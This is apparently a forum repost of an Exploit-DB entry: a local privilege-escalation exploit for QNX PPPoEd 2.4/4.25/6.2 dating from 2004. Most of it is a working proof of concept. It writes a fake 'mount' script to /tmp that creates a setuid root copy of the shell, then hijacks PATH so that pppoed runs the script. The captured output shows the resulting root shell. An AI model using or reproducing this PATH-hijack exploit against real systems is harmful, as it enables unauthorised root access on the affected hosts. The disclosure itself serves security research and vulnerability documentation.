Exploit QNX PPPoEd 2.4/4.25/6.2 - Path Environment Variable Local Command Execution

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
24570
Проверка EDB
  1. Пройдено
Автор
JULIO CESAR FORT
Тип уязвимости
LOCAL
Платформа
LINUX
CVE
N/A
Дата публикации
2004-09-03
QNX PPPoEd 2.4/4.25/6.2 - Path Environment Variable Local Command Execution
Код:
source: https://www.securityfocus.com/bid/11105/info

QNX PPoEd is reported prone to a problem that exists in the handling of paths to external executables that are employed by PPPoEd. Because of this, an attacker may be able to gain elevated privileges on a host with a vulnerable version of PPPoEd installed.

$ cd /tmp
$ cat << _EOF_ > mount
#!/bin/sh
cp /bin/sh /tmp/rootshell
chown root /tmp/rootshell
chmod 4777 /tmp/rootshell
echo "Here comes your root shell"
_EOF_

$ chmod 755 mount
$ export PATH=/tmp:$PATH
$ /usr/sbin/pppoed
$ ls -la /tmp
-rwxr-xr-x 1 sandimas users 88 Aug 25 2004 mount
-rwsrwxrwx 1 root 100 153384 Jun 22 2001 /tmp/rootshell
$ /tmp/rootshell
Here comes your root shell
# uname -a
QNX sandimas 6.1.0 2001/06/25-15:31:48 edt x86pc x86
#
 
Источник
www.exploit-db.com

Похожие темы